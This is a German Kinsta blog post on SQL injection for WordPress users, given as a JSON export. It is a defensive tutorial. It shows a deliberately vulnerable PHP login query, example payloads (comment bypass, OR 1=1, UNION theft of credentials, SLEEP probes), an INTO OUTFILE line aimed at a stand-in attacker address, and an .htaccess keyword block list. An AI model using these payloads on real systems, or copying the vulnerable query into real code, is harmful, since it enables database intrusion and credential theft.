{"id":31455,"date":"2023-10-20T01:26:59","date_gmt":"2023-10-20T00:26:59","guid":{"rendered":"https:\/\/kinsta.com\/?p=62827"},"modified":"2023-10-23T13:39:15","modified_gmt":"2023-10-23T12:39:15","slug":"sql-injection","status":"publish","type":"post","link":"https:\/\/kinsta.com\/de\/blog\/sql-injection\/","title":{"rendered":"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer"},"content":{"rendered":"<p>Eine SQL Injection ist eine Technik zur Code-Injektion, die Angreifer nutzen, um Schwachstellen in der Datenbankschicht einer Website oder Anwendung auszunutzen. Wenn es Angreifern gelingt, eine SQL-Injection durchzuf\u00fchren, k\u00f6nnen sie sich Zugang zur Datenbank verschaffen.<\/p>\n<p>Wenn du verstehst, wie diese Angriffe funktionieren, bist du besser ger\u00fcstet, um sie zu verhindern. Auf diese Weise kannst du deine Website und deine Kunden in Sicherheit bringen.<\/p>\n<p>In diesem Beitrag gehen wir auf die verschiedenen Arten von SQL-Injections ein. Au\u00dferdem zeigen wir dir, wie du deine Website vor diesen Angriffen sch\u00fctzen kannst. Lass uns gleich eintauchen!<\/p>\n<div><\/div><kinsta-auto-toc heading=\"Table of Contents\" exclude=\"last\" list-style=\"arrow\" selector=\"h2\" count-number=\"-1\"><\/kinsta-auto-toc>\n<h2>Was ist eine SQL-Injektion?<\/h2>\n<p>SQL (Structured Query Language) ist eine Sprache, die es uns erm\u00f6glicht, <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-datenbank\/\">mit Datenbanken zu interagieren<\/a>. Moderne Webanwendungen nutzen Datenbanken, um Daten zu verwalten und dem Leser dynamische Inhalte anzuzeigen.<\/p>\n<p>Bei einer SQL-Injection (oder SQLi) versucht ein Benutzer, b\u00f6sartige SQL-Anweisungen in eine Webanwendung einzuf\u00fcgen. Wenn sie erfolgreich sind, k\u00f6nnen sie auf sensible Daten in der Datenbank zugreifen.<\/p>\n<p>Auch im Jahr 2023 geh\u00f6ren SQL-Injections zu den h\u00e4ufigsten Angriffen im Internet. Allein im Jahr 2022 wurden <a href=\"https:\/\/www.cvedetails.com\/vulnerability-list\/year-2022\/opsqli-1\/sql-injection.html\" target=\"_blank\" rel=\"noopener noreferrer\">1162 SQL-Injection-Schwachstellen<\/a> in die CVE-Sicherheitsdatenbank aufgenommen.<\/p>\n<p>Die gute Nachricht ist, dass SQL-Injektionen nicht mehr so h\u00e4ufig vorkommen wie fr\u00fcher. Die meisten Anwendungen haben sich weiterentwickelt, um sich vor SQL-Angriffen zu sch\u00fctzen.<\/p>\n<p>Im Jahr 2012 waren <a href=\"https:\/\/www.techworld.com\/news\/security\/barclays-97-percent-of-data-breaches-still-due-sql-injection-3331283\/\" target=\"_blank\" rel=\"noopener noreferrer\">97 Prozent aller Datenschutzverletzungen<\/a> auf SQL-Injektionen zur\u00fcckzuf\u00fchren. Heutzutage ist diese Zahl zwar immer noch hoch, aber viel \u00fcberschaubarer.<\/p>\n<h2>Wie funktioniert die SQL-Injection-Schwachstelle?<\/h2>\n<p>Eine SQL-Injection-Schwachstelle verschafft einem Angreifer durch die Verwendung b\u00f6sartiger SQL-Anweisungen vollst\u00e4ndigen Zugriff auf die Datenbank deiner Anwendung.<\/p>\n<p>Schauen wir uns ein Beispiel f\u00fcr eine verwundbare Anwendung an.<\/p>\n<p>Stell dir den Arbeitsablauf einer typischen Webanwendung vor, die Datenbankabfragen durch Benutzereingaben beinhaltet. Du nimmst die Benutzereingaben \u00fcber ein Formular entgegen, zum Beispiel ein Anmeldeformular. Dann fragst du deine Datenbank mit den vom Benutzer eingegebenen Feldern ab, um ihn zu authentifizieren. Die Struktur der Abfrage an deine Datenbank sieht etwa so aus:<\/p>\n<pre><code class=\"language-sql\">select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n<p>Der Einfachheit halber nehmen wir an, dass du deine Passw\u00f6rter im Klartext speicherst. Es ist jedoch ratsam, <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-salts\/\">deine Passw\u00f6rter mit Salts zu versehen<\/a> und dann zu hashen. Wenn du den Benutzernamen und das Passwort aus dem Formular erhalten hast, kannst du die Abfrage in PHP wie folgt definieren:<\/p>\n<pre><code class=\"language-php\">\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\n<p>Wenn jemand den Wert &#8222;admin&#8216;;-&#8220; in das Feld f\u00fcr den Benutzernamen eingibt, lautet die resultierende SQL-Abfrage, die die Variable $db_query erzeugt, wie folgt:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\n<p>Was bewirkt diese Abfrage?<\/p>\n<p>In SQL beginnt das Symbol &#8212; einen Kommentar, sodass alles, was danach kommt, ignoriert wird. Dadurch wird die Passwortpr\u00fcfung aus der Abfrage entfernt. Wenn also &#8222;admin&#8220; ein g\u00fcltiger Benutzername ist, kann sich der Angreifer anmelden, ohne das Passwort zu kennen. Zumindest dann, wenn es keine Sicherheitsvorkehrungen gegen diese Art von Angriffen gibt.<\/p>\n<p>Alternativ kann in diesem Beispiel auch ein boolescher Angriff verwendet werden, um Zugang zu erhalten. Wenn ein Angreifer &#8222;password&#8216; oder 1=1;-&#8220; in das Passwortfeld eingibt, w\u00fcrde die Abfrage folgenderma\u00dfen aussehen:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n<p>In diesem Fall w\u00fcrdest du, auch wenn dein Passwort falsch ist, f\u00fcr die Anwendung authentifiziert werden. Wenn deine Webseite die Ergebnisse der Datenbankabfrage anzeigt, kann ein Angreifer den Befehl zum Anzeigen von Tabellen, den Befehl zum Anzeigen der Tabellen in der Datenbank verwenden und dann selektiv Tabellen l\u00f6schen, wenn er das m\u00f6chte.<\/p>\n<figure>\n<figure style=\"width: 666px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\" alt=\"Exploits einer Mutter : Ein Cartoon \u00fcber SQL-Injection \" width=\"666\" height=\"205\"><figcaption class=\"wp-caption-text\">Ein Cartoon \u00fcber SQL-Injection (<strong>Quelle:<\/strong> <a href=\"https:\/\/xkcd.com\/327\/\" target=\"_blank\" rel=\"noopener noreferrer\">XKCD<\/a>)<\/figcaption><\/figure>\n<p>Exploits of a Mom, ein beliebter Comicstrip von XKCD, zeigt das Gespr\u00e4ch einer Mutter mit der Schule ihres Sohnes, in dem sie gefragt wird, ob sie ihren Sohn wirklich &#8222;Robert&#8216;); DROP TABLE Students; -&#8220; genannt hat.<\/figure>\n<h2>Arten von SQL Injection<\/h2>\n<p>Nachdem du nun die Grundlagen einer SQL-Injection-Schwachstelle kennst, wollen wir uns die verschiedenen Arten von SQL-Injection-Angriffen und die Gr\u00fcnde daf\u00fcr ansehen.<\/p>\n<h3>In-Band SQL Injection<\/h3>\n<p>In-Band SQL Injection ist die einfachste Form der SQL Injection. Dabei kann der Angreifer denselben Kanal nutzen, um den b\u00f6sartigen SQL-Code in die Anwendung einzuf\u00fcgen und die Ergebnisse zu sammeln.<\/p>\n<p>Schauen wir uns zwei Formen von In-Band-SQL-Injection-Angriffen an.<\/p>\n<h4>Fehlerbasierter Angriff<\/h4>\n<p>Ein fehlerbasierter Angriff liegt vor, wenn jemand absichtlich die SQL-Abfrage manipuliert, um einen Datenbankfehler zu erzeugen. Die von der Datenbank zur\u00fcckgegebene Fehlermeldung enth\u00e4lt oft Informationen \u00fcber die Datenbankstruktur, die der Angreifer nutzen kann, um das System weiter auszunutzen.<\/p>\n<p>Ein Angreifer kann zum Beispiel &#8218; OR &#8218;1&#8216;=&#8217;1 in ein Formularfeld eingeben. Wenn die Anwendung verwundbar ist, k\u00f6nnte sie eine Fehlermeldung ausgeben, die Informationen \u00fcber die Datenbank enth\u00e4lt.<\/p>\n<h4>Union-basierte Attacke<\/h4>\n<p>Union-basierte SQL-Injection-Angriffe verwenden den SQL UNION-Operator, um die Ergebnisse der urspr\u00fcnglichen Abfrage mit den Ergebnissen von eingeschleusten b\u00f6sartigen Abfragen zu kombinieren.<\/p>\n<p>Dadurch kann der Angreifer Informationen aus anderen Tabellen der Datenbank abrufen:<\/p>\n<pre><code class=\"language-sql\">select title, link from post_table\nwhere id &lt; 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\n<p>In dieser Abfrage kombiniert der UNION-Operator die Ergebnisse der urspr\u00fcnglichen Abfrage mit den Ergebnissen von <em>SELECT username<\/em>, <em>password<\/em> <em>FROM user_table<\/em>. Wenn die Anwendung verwundbar ist und die Benutzereingaben nicht ordnungsgem\u00e4\u00df bereinigt, k\u00f6nnte sie eine Seite mit Benutzernamen und Passw\u00f6rtern aus der Benutzertabelle zur\u00fcckgeben.<\/p>\n<h2>Inferentielle SQL-Injektion (Blind SQL Injection)<\/h2>\n<p>Selbst wenn ein Angreifer einen Fehler in der SQL-Abfrage erzeugt, wird die Antwort der Abfrage m\u00f6glicherweise nicht direkt an die Webseite \u00fcbermittelt. In diesem Fall muss der Angreifer weiter nachforschen.<\/p>\n<p>Bei dieser Form der SQL-Injektion sendet der Angreifer verschiedene Abfragen an die Datenbank, um herauszufinden, wie die Anwendung diese Antworten auswertet. Eine inferentielle SQL-Injection wird manchmal auch als blinde SQL-Injection bezeichnet.<\/p>\n<p>Im Folgenden werden wir uns zwei Arten von inferentiellen SQL-Injections ansehen: boolesche SQL-Injektion und zeitbasierte SQL-Injektion.<\/p>\n<h4>Boolesche Attacke<\/h4>\n<p>Wenn eine SQL-Abfrage zu einem Fehler f\u00fchrt, der nicht intern in der Anwendung behandelt wurde, kann die resultierende Webseite einen Fehler ausl\u00f6sen, eine leere Seite laden oder nur teilweise geladen werden. Bei einer booleschen SQL-Injektion pr\u00fcft ein Angreifer, welche Teile der Benutzereingabe f\u00fcr SQL-Injektionen anf\u00e4llig sind, indem er zwei verschiedene Versionen einer booleschen Klausel in der Eingabe ausprobiert:<\/p>\n<ul>\n<li>&#8222;&#8230; und 1=1&#8220;<\/li>\n<li>&#8222;&#8230; und 1=2&#8220;<\/li>\n<\/ul>\n<p>Diese Abfragen sind so konzipiert, dass sie eine Bedingung enthalten, die entweder wahr oder falsch ist. Wenn die Bedingung wahr ist, wird die Seite normal geladen. Wenn sie falsch ist, wird die Seite m\u00f6glicherweise anders geladen oder es wird ein Fehler angezeigt.<\/p>\n<p>Indem er beobachtet, wie die Seite geladen wird, kann der Angreifer feststellen, ob die Bedingung wahr oder falsch war, auch wenn er die eigentliche SQL-Abfrage oder die Antwort der Datenbank nicht sieht. Wenn du mehrere \u00e4hnliche Bedingungen zusammenstellst, kannst du langsam Informationen aus der Datenbank extrahieren.<\/p>\n<h4>Zeitbasierter Angriff<\/h4>\n<p>Mit einem zeitbasierten SQL-Injection-Angriff kann ein Angreifer <a href=\"https:\/\/kinsta.com\/de\/docs\/service-information\/sicherheitsschwachstellen-offenlegen\/\">feststellen, ob eine Schwachstelle in einer Webanwendung vorhanden ist<\/a>. Ein Angreifer nutzt eine vordefinierte zeitbasierte Funktion des Datenbankmanagementsystems, das von der Anwendung verwendet wird. <a href=\"https:\/\/kinsta.com\/de\/blog\/was-ist-mysql\/\">In MySQL<\/a> zum Beispiel weist die <a href=\"http:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/miscellaneous-functions.html#function_sleep\" target=\"_blank\" rel=\"noopener noreferrer\">Funktion <em>sleep()<\/em><\/a> die Datenbank an, eine bestimmte Anzahl von Sekunden zu warten.<\/p>\n<pre><code class=\"language-sql\">select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\n<p>Wenn eine solche Abfrage zu einer Verz\u00f6gerung f\u00fchrt, wei\u00df der Angreifer, dass sie verwundbar ist. Dieser Ansatz \u00e4hnelt den booleschen Angriffen, da du keine tats\u00e4chliche Antwort von der Datenbank erh\u00e4ltst. Allerdings kann man daraus Informationen gewinnen, wenn der Angriff erfolgreich ist.<\/p>\n<h2>Out-of-Band SQL Injection<\/h2>\n<p>Bei einem Out-of-Band-SQL-Injection-Angriff manipuliert der Angreifer die SQL-Abfrage, um die Datenbank anzuweisen, Daten an einen vom Angreifer kontrollierten Server zu \u00fcbermitteln. Dies wird in der Regel durch Datenbankfunktionen erreicht, die externe Ressourcen anfordern k\u00f6nnen, wie z. B. HTTP-Anfragen oder DNS-Abfragen.<\/p>\n<p>Ein Out-of-Band SQL-Injection-Angriff nutzt eine externe Dateiverarbeitungsfunktion deines DBMS. In MySQL k\u00f6nnen die Funktionen LOAD_FILE() und INTO OUTFILE verwendet werden, um MySQL aufzufordern, die Daten an eine externe Quelle zu \u00fcbertragen.<\/p>\n<p>So k\u00f6nnte ein Angreifer OUTFILE nutzen, um die Ergebnisse einer Abfrage an eine externe Quelle zu senden:<\/p>\n<pre><code class=\"language-sql\">select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\n<p>In \u00e4hnlicher Weise kann die Funktion LOAD_FILE() verwendet werden, um eine Datei vom Server zu lesen und ihren Inhalt anzuzeigen. Eine Kombination aus LOAD_FILE() und OUTFILE kann verwendet werden, um den Inhalt einer Datei auf dem Server zu lesen und ihn dann an einen anderen Ort zu \u00fcbertragen.<\/p>\n<h2>Wie man SQL-Injections verhindert<\/h2>\n<p>Bisher haben wir uns mit den Schwachstellen in einer Webanwendung besch\u00e4ftigt, die zu SQL-Injection-Angriffen f\u00fchren k\u00f6nnen. Eine SQL-Injection-Schwachstelle kann von einem Angreifer genutzt werden, um den Inhalt deiner Datenbank zu lesen, zu ver\u00e4ndern oder sogar zu l\u00f6schen.<\/p>\n<p>Au\u00dferdem kann sie es ihm erm\u00f6glichen, eine Datei an einem beliebigen Ort innerhalb des Servers zu lesen und den Inhalt an einen anderen Ort zu \u00fcbertragen. In diesem Abschnitt stellen wir verschiedene Techniken vor, mit denen du deine Webanwendung und Website vor SQL-Injection-Angriffen sch\u00fctzen kannst.<\/p>\n<h3>Benutzereingaben entgehen<\/h3>\n<p>Im Allgemeinen ist es schwierig festzustellen, ob eine Benutzereingabe b\u00f6sartig ist oder nicht. Eine g\u00e4ngige Methode ist daher, Sonderzeichen in Benutzereingaben zu umgehen. Dieses Verfahren kann zum Schutz vor SQL-Injection-Angriffen beitragen.<\/p>\n<p>In PHP kannst du eine Zeichenkette vor dem Aufbau der Abfrage mit der Funktion <code>mysqli_real_escape_string()<\/code> entschl\u00fcsseln:<\/p>\n<pre><code class=\"language-sql\">$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\n<p>Wenn du Benutzereingaben als HTML darstellst, ist es au\u00dferdem wichtig, Sonderzeichen in die entsprechenden HTML-Zeichen umzuwandeln, um Cross-Site Scripting (XSS)-Angriffe zu verhindern. Du kannst Sonderzeichen in PHP mit der Funktion <code>htmlspecialchars()<\/code> umwandeln.<\/p>\n<h3>Prepared Statements verwenden<\/h3>\n<p>Alternativ kannst du auch Prepared Statements verwenden, um SQL-Injections zu vermeiden. Eine vorbereitete Anweisung ist eine Vorlage f\u00fcr eine SQL-Abfrage, bei der du zu einem sp\u00e4teren Zeitpunkt Parameter angibst, um sie auszuf\u00fchren.<\/p>\n<p>Hier ist ein Beispiel f\u00fcr ein Prepared Statement in PHP und MySQLi:<\/p>\n<pre><code class=\"language-php\">$query = $mysql_connection-&gt;prepare(\"select * from user_table where username = ? and password = ?\");\n$query-&gt;execute(array($username, $password));<\/code><\/pre>\n<h3>Andere Hygiene-Checks zur Verhinderung von SQL-Angriffen<\/h3>\n<p>Der n\u00e4chste Schritt, um diese Schwachstelle zu entsch\u00e4rfen, besteht darin, den Zugriff auf die Datenbank auf das N\u00f6tigste zu beschr\u00e4nken.<\/p>\n<p>Du kannst zum Beispiel deine Webanwendung mit dem DBMS \u00fcber einen bestimmten Benutzer verbinden, der nur Zugriff auf die entsprechende Datenbank hat.<\/p>\n<p>Au\u00dferdem solltest du den Zugriff des Datenbankbenutzers auf alle anderen Bereiche des Servers beschr\u00e4nken. Vielleicht m\u00f6chtest du auch bestimmte SQL-Schl\u00fcsselw\u00f6rter in deiner URL \u00fcber deinen Webserver blockieren.<\/p>\n<p>Wenn du <a href=\"https:\/\/kinsta.com\/de\/blog\/nginx-vs-apache\/\">Apache als Webserver verwendest<\/a>, kannst du die folgenden Codezeilen in deiner <em><a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-htaccess-datei\/\">.htaccess<\/a><\/em><a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-htaccess-datei\/\"> datei<\/a> verwenden, um einem potenziellen Angreifer einen <a href=\"https:\/\/kinsta.com\/de\/blog\/403-forbidden-fehler\/#:~:text=The%20403%20Forbidden%20error%20means%20that%20your%20server%20is%20working,file%20permissions%20or%20.htaccess%20file.\"><em>403 Forbidden-Fehler<\/em><\/a> anzuzeigen.<\/p>\n<p>Du solltest vorsichtig sein, bevor du diese Technik anwendest, denn Apache zeigt einem Leser eine Fehlermeldung an, wenn die URL diese Schl\u00fcsselw\u00f6rter enth\u00e4lt.<\/p>\n<pre><code>RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta betreibt WordPress auf dem Webserver Nginx, der keine .htaccess-Datei unterst\u00fctzt. Wenn du eine Regel zum Blockieren von Schl\u00fcsselw\u00f6rtern in deiner URL einrichten m\u00f6chtest, wende dich an das Kinsta-Supportteam, das dir dabei helfen kann.<\/p>\n<\/aside>\n\n<p>Ein weiterer Tipp zur Vorbeugung: Du solltest immer <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-gehacked\/#2-keep-your-site-updated\">aktuelle Software verwenden<\/a>. Wenn eine neue Version oder ein Patch ver\u00f6ffentlicht wird, werden die Fehler, die mit dem Update behoben wurden, in den Versionshinweisen aufgef\u00fchrt. Sobald die Details eines Fehlers \u00f6ffentlich bekannt sind, kann es riskant sein, eine alte Version einer Software zu benutzen.<\/p>\n<h2>SQL-Injektion in WordPress<\/h2>\n<p>Du bist vor einer SQL-Injection-Schwachstelle sicher, wenn du aktuelle WordPress-Kerndateien verwendest. Durch die Verwendung von Plugins und Themes von Drittanbietern ist deine Website jedoch immer in gewissem Ma\u00dfe angreifbar. Du kannst dieses Risiko weitgehend minimieren, indem du Plugins und Themes verwendest, die regelm\u00e4\u00dfig aktualisiert werden und die sichere Programmierpraktiken anwenden.<\/p>\n<p>Deine WordPress-Website ist nur so stark wie ihr schw\u00e4chstes Glied. In diesem Abschnitt gehen wir auf die wichtigsten \u00dcberlegungen zur Vermeidung von SQL-Injection-Schwachstellen in WordPress ein und zeigen dir, wie du deine bestehende WordPress-Website auf Schwachstellen \u00fcberpr\u00fcfen kannst.<\/p>\n<h3>Schutz vor SQL-Injection-Schwachstellen in WordPress<\/h3>\n<p>Um die Schwachstelle der SQL-Injection in deinem <a href=\"https:\/\/kinsta.com\/de\/blog\/schnellsten-wordpress-theme\/\">WordPress-Theme<\/a> oder -Plugin zu entsch\u00e4rfen, musst du eine einzige Regel befolgen: Verwende immer die vorhandenen WordPress-Funktionen, wenn du mit der Datenbank interagierst.<\/p>\n<p>Diese Funktionen werden w\u00e4hrend des WordPress-Entwicklungsprozesses gr\u00fcndlich auf SQL-Injection-Schwachstellen getestet. Wenn du zum Beispiel einen Kommentar zu einem Beitrag hinzuf\u00fcgen m\u00f6chtest, verwende die Funktion <em><a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/wp_insert_comment\/\" target=\"_blank\" rel=\"noopener noreferrer\">wp_insert_comment() Funktion<\/a><\/em> anstatt die Daten direkt in die Tabelle <em>wp_comments<\/em> einzuf\u00fcgen.<\/p>\n<p>Obwohl Funktionen erweiterbar sind, kann es vorkommen, dass du eine komplexe Abfrage durchf\u00fchren musst. In einem solchen Fall solltest du die <a href=\"https:\/\/developer.wordpress.org\/reference\/classes\/wpdb\/\" target=\"_blank\" rel=\"noopener noreferrer\">Funktionsgruppe<em>$wp_db<\/em><\/a> verwenden. Du kannst <em>$wpdb-&gt;prepare()<\/em> verwenden, um Benutzereingaben zu umgehen, bevor du die Abfrage erstellst.<\/p>\n<p>Au\u00dferdem findest du hier eine Liste von Funktionen zur <a href=\"https:\/\/developer.wordpress.org\/themes\/theme-security\/data-sanitization-escaping\/\" target=\"_blank\" rel=\"noopener noreferrer\">Datenbereinigung in WordPress<\/a>. Sie k\u00f6nnen dir helfen, bestimmte Arten von Benutzereingaben wie E-Mails und URLs zu vermeiden.<\/p>\n<h2>Sichere deine WordPress-Website<\/h2>\n<p>Auch wenn <a href=\"https:\/\/kinsta.com\/de\/blog\/ist-wordpress-sicher\/\">WordPress selbst sicher ist<\/a>, k\u00f6nnen Probleme wie veraltete Kernsoftware und <a href=\"https:\/\/kinsta.com\/de\/blog\/nulled-wordpress-plugins-und-themes\/\">fehlerhafte Plugins<\/a> zu Sicherheitsl\u00fccken f\u00fchren. Es gibt zwar keine Alternative dazu, deine WordPress-Website gr\u00fcndlich auf SQL-Injection-Schwachstellen zu \u00fcberpr\u00fcfen, aber die Komplexit\u00e4t einer Website kann diese Aufgabe zu einer Herausforderung machen.<\/p>\n<p>Du kannst ein Online-Scan-Tool wie <a href=\"https:\/\/wpscan.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">WPScan<\/a> verwenden. Wir empfehlen au\u00dferdem, deine Plugins zu \u00fcberpr\u00fcfen, um festzustellen, ob ihre Entwicklung zum Stillstand gekommen ist. Wenn sie nicht mehr gepflegt werden, solltest du sie nicht auf deiner Website verwenden.<\/p>\n<p>Wenn du sie dennoch verwenden musst, solltest du ihren Code und ihre Funktionen gr\u00fcndlich auf Schwachstellen testen. Ansonsten solltest du die folgenden Hygiene-Checks durchf\u00fchren:<\/p>\n<ul>\n<li>Aktualisiere PHP, WordPress Core und MySQL<\/li>\n<li>Aktualisiere Plugins und Themes von Drittanbietern<\/li>\n<li>Vermeide es, den Root-Benutzer f\u00fcr die Verbindung mit der SQL-Datenbank zu verwenden<\/li>\n<li>Beschr\u00e4nke den Zugriff des SQL-Benutzers auf sensible Verzeichnisse<\/li>\n<li>Blockiere SQL-Schl\u00fcsselw\u00f6rter auf deinem Server<\/li>\n<li>Bewahre Backups deiner Website au\u00dferhalb deines Standorts auf, f\u00fcr den Fall, dass sie unwiderruflich besch\u00e4digt wird<\/li>\n<\/ul>\n<p>Hier findest du einen ausf\u00fchrlichen Beitrag \u00fcber die <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-sicherheit\/\">Sicherheit von WordPress<\/a> und eine umfassende Liste von \u00dcberpr\u00fcfungen. Au\u00dferdem solltest du in diese <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-sicherheits-plugin\/\">Top-Sicherheits-Plugins f\u00fcr WordPress<\/a> investieren. Hier erf\u00e4hrst du, was du tun solltest, wenn deine WordPress-Website trotz deiner besten Bem\u00fchungen <a href=\"https:\/\/kinsta.com\/de\/blog\/wordpress-gehacked\/\">gehackt wird<\/a>.<\/p>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Alle WordPress-Websites, die bei Kinsta gehostet werden, liegen bei Cloudflare und verf\u00fcgen \u00fcber Sicherheitsma\u00dfnahmen und -tools auf Unternehmensniveau.<\/p>\n<\/aside>\n\n<h2>Ist SQL Injection illegal?<\/h2>\n<p>Auf jeden Fall, ja! Auch wenn es eine tats\u00e4chliche Sicherheitsl\u00fccke gibt, versucht ein Angreifer, sich Zugang zu Daten zu verschaffen, die ihm sonst nicht zur Verf\u00fcgung stehen w\u00fcrden.<\/p>\n<p>Stell dir vor, jemand l\u00e4sst seine Schl\u00fcssel im Auto liegen. Ist es eine Straftat, mit dem Auto wegzufahren, nur weil es offen und unbeaufsichtigt gelassen wurde?<\/p>\n<p>Die Handlung von SQLi f\u00e4llt in verschiedenen L\u00e4ndern unter unterschiedliche Gesetze. In den USA f\u00e4llt sie unter den <a href=\"https:\/\/www.justice.gov\/sites\/default\/files\/criminal-ccips\/legacy\/2015\/01\/14\/ccmanual.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Fraud and Abuse Act<\/a> (1986) und in Gro\u00dfbritannien unter den <a href=\"http:\/\/www.legislation.gov.uk\/ukpga\/1990\/18\/contents\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Misuse Act<\/a> (1990).<\/p>\n<h2>Zusammenfassung<\/h2>\n<p>SQL-Injections sind seit langem einer der h\u00e4ufigsten Angriffe auf alle Arten von Websites. Selbst WordPress kann dich nicht vor SQL-Angriffen sch\u00fctzen, wenn du keine Ma\u00dfnahmen zum Schutz deiner Website ergreifst.<\/p>\n<p>Um diese Angriffe zu verhindern, musst du:<\/p>\n<ul>\n<li>Verstehen, wie die SQL-Injection-Schwachstelle funktioniert<\/li>\n<li>Verschiedene M\u00f6glichkeiten untersuchen, wie Angreifer SQLi nutzen k\u00f6nnen, um unbefugten Zugriff auf deine Webanwendung zu erhalten<\/li>\n<li>Methoden implementieren, um deine Website vor SQLi-Angriffen zu sch\u00fctzen, z. B. das Escapen von Benutzereingaben und die Verwendung vorbereiteter Anweisungen<\/li>\n<li>Befolge eine Sicherheits\u00fcberpr\u00fcfungsroutine<\/li>\n<\/ul>\n<p>Spare Zeit und Kosten und maximiere die Leistung deiner Website mit Integrationen auf Unternehmensebene im Wert von \u00fcber 275 US-Dollar, die in jedem Managed WordPress-Plan enthalten sind. Dazu geh\u00f6ren ein leistungsstarkes CDN, DDoS-Schutz, Malware- und Hacking-Abwehr, Edge Caching und die schnellsten CPU-Maschinen von Google. Du bekommst keine langfristigen Vertr\u00e4ge, Unterst\u00fctzung bei der Migration und eine 30-Tage-Geld-zur\u00fcck-Garantie.<\/p>\n<p><a href=\"https:\/\/kinsta.com\/de\/wordpress-hosting\/\">Schau dir unsere Tarife an<\/a> oder sprich mit dem Vertrieb, um den f\u00fcr dich passenden Tarif zu finden.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Eine SQL Injection ist eine Technik zur Code-Injektion, die Angreifer nutzen, um Schwachstellen in der Datenbankschicht einer Website oder Anwendung auszunutzen. Wenn es Angreifern gelingt, eine &#8230;<\/p>\n","protected":false},"author":118,"featured_media":31469,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kinsta_gated_content":false,"_kinsta_gated_content_redirect":"","footnotes":""},"tags":[264,197],"topic":[999],"class_list":["post-31455","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-sitesecurity","tag-wordpresshack","topic-wordpress-entwicklung"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v24.6 (Yoast SEO v24.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer - Kinsta\u00ae<\/title>\n<meta name=\"description\" content=\"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL Injection: Ein detaillierter Leitfaden f\u00fcr WordPress-Benutzer\" \/>\n<meta property=\"og:description\" content=\"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kinsta.com\/de\/blog\/sql-injection\/\" \/>\n<meta property=\"og:site_name\" content=\"Kinsta\u00ae\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Kinsta-Deutschland-207459890108303\/\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-20T00:26:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-23T12:39:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1460\" \/>\n\t<meta property=\"og:image:height\" content=\"730\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Shaumik Daityari\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:description\" content=\"Erfahre, was eine SQL-Injection ist, wie die SQL-Injection-Schwachstelle in deinen Webanwendungen (z. B. WordPress-Seiten) aussehen kann und wie du Angriffe verhindern kannst.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/kinsta.com\/de\/wp-content\/uploads\/sites\/5\/2020\/01\/sql-injection.jpg\" \/>\n<meta name=\"twitter:creator\" content=\"@Kinsta_DE\" \/>\n<meta name=\"twitter:site\" content=\"@Kinsta_DE\" \/>\n<meta 